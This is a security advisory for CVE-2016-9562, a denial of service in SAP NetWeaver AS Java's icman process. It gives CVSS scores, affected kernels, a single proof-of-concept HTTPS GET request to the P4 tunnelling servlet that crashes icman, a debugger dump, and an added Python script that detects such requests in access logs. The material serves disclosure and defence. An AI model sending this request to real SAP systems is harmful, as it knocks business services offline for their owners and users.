ERPScan advisory ERPSCAN-16-033
Apr 22, 2016

SAP NetWeaver AS JAVA icman - DoS vulnerability (CVE-2016-9562)

Source: erpscan.io

CVSS3: 7.5 High
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
Attack Vector: Network; Attack Complexity: Low; Privileges Required: None; User Interaction: None; Scope: Unchanged; Confidentiality Impact: None; Integrity Impact: None; Availability Impact: High

CVSS2: 5.0 Medium
AV:N/AC:L/Au:N/C:N/I:N/A:P
Access Vector: Network; Access Complexity: Low; Authentication: None; Confidentiality Impact: None; Integrity Impact: None; Availability Impact: Partial

EPSS: 0.004 Low (percentile 71.5%)

**Application:** SAP NetWeaver AS JAVA
**Versions Affected:** SAP NetWeaver AS JAVA 7.4
**Vendor URL:** SAP
**Bugs:** Denial of Service
**Reported:** 22.04.2016
**Vendor response:** 23.04.2016
**Date of Public Advisory:** 09.08.2016
**Reference:** SAP Security Note 2313835
**Author:** Vahagn Vardanyan (ERPScan)

VULNERABILITY INFORMATION

Class: Denial of Service
Impact: Denial of Service
Remotely Exploitable: Yes
Locally Exploitable: Yes
CVE: CVE-2016-9562

CVSS Information

CVSS Base Score v3: 7.5 / 10
CVSS Base Vector:

AV: Attack Vector (Related exploit range) Network (N)
AC: Attack Complexity (Required attack complexity) Low (L)
PR: Privileges Required (Level of privileges needed to exploit) None (N)
UI: User Interaction (Required user participation) None (N)
S: Scope (Change in scope due to impact caused to components beyond the vulnerable component) Unchanged (U)
C: Impact to Confidentiality None (N)
I: Impact to Integrity None (N)
A: Impact to Availability High (H)

Description

An unauthenticated remote attacker can send a specially crafted HTTP request that crashes the SAP icman process (the Internet Communication Manager of SAP NetWeaver AS Java), causing a denial of service.

Business risk

An attacker can use this Denial of Service vulnerability to terminate the process of the vulnerable component. Until the process is restarted nobody can use the service, which disrupts business processes, causes system downtime and, as a result, damages business reputation.

VULNERABLE PACKAGES

SAP KERNEL 7.21 32-BIT
SAP KERNEL 7.21 32-BIT UNICODE
SAP KERNEL 7.21 64-BIT
SAP KERNEL 7.21 64-BIT UNICODE
SAP KERNEL 7.21 EXT 32-BIT
SAP KERNEL 7.21 EXT 32-BIT UC
SAP KERNEL 7.21 EXT 64-BIT
SAP KERNEL 7.21 EXT 64-BIT UC
SAP KERNEL 7.22 64-BIT
SAP KERNEL 7.22 64-BIT UNICODE
SAP KERNEL 7.22 EXT 64-BIT
SAP KERNEL 7.22 EXT 64-BIT UC
SAP KERNEL 7.42 64-BIT
SAP KERNEL 7.42 64-BIT UNICODE
SAP KERNEL 7.45 64-BIT
SAP KERNEL 7.45 64-BIT UNICODE

SOLUTIONS AND WORKAROUNDS

To correct this vulnerability, install SAP Security Note 2313835.

TECHNICAL DESCRIPTION

The vulnerability is triggered by a single HTTPS GET request for the P4 tunnelling servlet (/sap.com~P4TunnelingApp!web/myServlet) on the AS Java HTTPS port (50005 in the PoC). The request is handed to the P4 plug-in inside the ICM process (icman), whose read handler dereferences a NULL pointer: in the debugger output below, rdi is 0 at icman!P4PlugInReadHandler+0xb9 (p4_plg.c line 1192 in the 7.42 kernel tree) and the instruction mov ecx,dword ptr [rdi+4] reads address 4. The resulting access violation terminates icman, and because the ICM terminates all HTTP(S) connections of the instance, the Java stack is unreachable until the process is restarted. No authentication is required. The fault is a read from a fixed low address, so it is a clean crash rather than a memory-corruption primitive, which is consistent with the advisory rating Confidentiality and Integrity impact as None.


PoC

HTTP request (absolute-form request-target, as sent by the researcher; SAP_IP is the target host):

GET https://SAP_IP:50005/sap.com~P4TunnelingApp!web/myServlet HTTP/1.1
Host: 172.16.10.65:50005
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close

WinDbg register dump and call stack of the crashing icman thread (rdi is 0, so the faulting mov reads address 4):

0:007> r
rax=0000a323260f1252 rbx=0000000025c500d0 rcx=0000000025c500d0
rdx=0000000000000001 rsi=0000000000000002 rdi=0000000000000000
rip=000000013f3af019 rsp=0000000003500d40 rbp=0000000003500e40
r8=0000000025c50400 r9=0000006c004c0002 r10=0000000003500c20
r11=00000000021b2df0 r12=0000000000000002 r13=000000013f2c0000
r14=0000000000000000 r15=0000000000000001
iopl=0 nv up ei ng nz ac po cy
cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010297
icman!P4PlugInReadHandler+0xb9:
00000001`3f3af019 8b4f04 mov ecx,dword ptr [rdi+4] ds:00000000`00000004=????????

00000000`03500d40 00000001`3f363fb5 icman!P4PlugInReadHandler+0xb9 [d:\depot\bas\742_rel\src\krn\si\ic\p4_plg.c @ 1192]
00000000`03500ec0 00000001`3f3638ea icman!IcmMplxAsyncReadDone+0x75 [d:\depot\bas\742_rel\src\krn\si\ic\icxxmplx.c @ 5088]
00000000`03500f10 00000001`3f362626 icman!IcmMplxExecCall+0x36a [d:\depot\bas\742_rel\src\krn\si\ic\icxxmplx.c @ 4808]
00000000`0350fd20 00000000`74901d9f icman!IcmMplxThread+0x5f6 [d:\depot\bas\742_rel\src\krn\si\ic\icxxmplx.c @ 3840]
00000000`0350fdb0 00000000`74901e3b MSVCR100!endthreadex+0x43
00000000`0350fde0 00000000`7716652d MSVCR100!endthreadex+0xdf
00000000`0350fe10 00000000`7729c541 kernel32!BaseThreadInitThunk+0xd
00000000`0350fe40 00000000`00000000 ntdll!RtlUserThreadStart+0x21
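A defender who cannot patch immediately will want to see whether the PoC path above is being requested. The script below is an added example, not ERPScan's or SAP's code. It assumes the ICM/AS Java HTTP access log is written in Apache Common Log Format (the icm/HTTP/logging_<n> profile parameter can emit LOGFORMAT=CLF); the sample log lines are constructed for the example. It normalises the request-target before matching, because the PoC uses an absolute-form target (https://host:port/path) while a browser sends origin-form (/path), and an attacker can percent-encode the tilde and exclamation mark in the servlet path to slip past a literal grep.

```python
"""Flag access-log requests for the P4 tunnelling servlet abused by CVE-2016-9562.

Added example, not ERPScan's or SAP's code.  Assumptions: the ICM/AS Java
HTTP access log is in Apache Common Log Format (ICM's icm/HTTP/logging_<n>
profile parameter can write LOGFORMAT=CLF); the servlet path is the one in
the advisory's PoC; the sample log lines below are constructed for this example.
"""
import re
from dataclasses import dataclass
from typing import Iterable, List
from urllib.parse import unquote

# Path of the P4 tunnelling servlet from the PoC request.
P4_TUNNEL_PATH = "/sap.com~P4TunnelingApp!web/myServlet"

# Common Log Format: host ident user [time] "method target proto" status bytes
CLF_RE = re.compile(
    r'^(?P<host>\S+) \S+ (?P<user>\S+) \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" '
    r'(?P<status>\d{3}|-) (?P<bytes>\d+|-)'
)


@dataclass
class Hit:
    src: str
    time: str
    method: str
    target: str   # request-target exactly as logged
    status: str   # '-' when no response was written


def request_path(target: str) -> str:
    """Normalise a request-target to a decoded origin-form path.

    The PoC uses absolute-form ('https://host:port/path'); a browser uses
    origin-form ('/path'); an attacker may percent-encode '~' or '!'.
    All three must map to the same path or a literal grep misses them.
    """
    if "://" in target:                        # absolute-form -> origin-form
        rest = target.split("://", 1)[1]
        slash = rest.find("/")
        target = rest[slash:] if slash >= 0 else "/"
    target = target.split("?", 1)[0]           # drop the query string
    return unquote(target)                     # %7E -> '~', %21 -> '!'


def find_p4_tunnel_requests(lines: Iterable[str]) -> List[Hit]:
    """Return one Hit per CLF line whose normalised path is the PoC servlet."""
    hits = []
    for line in lines:
        m = CLF_RE.match(line)
        if not m:
            continue                           # not CLF; leave for another parser
        if request_path(m["target"]) == P4_TUNNEL_PATH:
            hits.append(Hit(m["host"], m["time"], m["method"], m["target"], m["status"]))
    return hits


# Constructed sample: a normal portal hit, the PoC request verbatim (no
# status: the request had no response), a percent-encoded variant with a
# query string, and a request to a different servlet of the same application.
SAMPLE_LOG = [
    '10.0.0.5 - - [22/Apr/2016:10:15:01 +0000] "GET /irj/portal HTTP/1.1" 200 5120',
    '172.16.10.7 - - [22/Apr/2016:10:15:09 +0000] '
    '"GET https://172.16.10.65:50005/sap.com~P4TunnelingApp!web/myServlet HTTP/1.1" - -',
    '172.16.10.7 - - [22/Apr/2016:10:16:02 +0000] '
    '"GET /sap.com%7EP4TunnelingApp%21web/myServlet?x=1 HTTP/1.1" 500 0',
    '10.0.0.9 - - [22/Apr/2016:10:17:44 +0000] '
    '"POST /sap.com~P4TunnelingApp!web/otherServlet HTTP/1.1" 404 0',
]

if __name__ == "__main__":
    for h in find_p4_tunnel_requests(SAMPLE_LOG):
        print(f"{h.time} {h.src} {h.method} {h.target} status={h.status}")
```

Two caveats when using this. First, the request that actually kills icman may never reach the access log, since the crash happens in the plug-in's read handler before a response is produced; pair the log search with process-restart monitoring of icman (for example sapcontrol GetProcessList or the SAP MMC). Second, the P4 tunnelling application has legitimate clients (P4 over HTTP from administration tools), so baseline normal sources before alerting on every hit. Neither replaces installing SAP Security Note 2313835.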

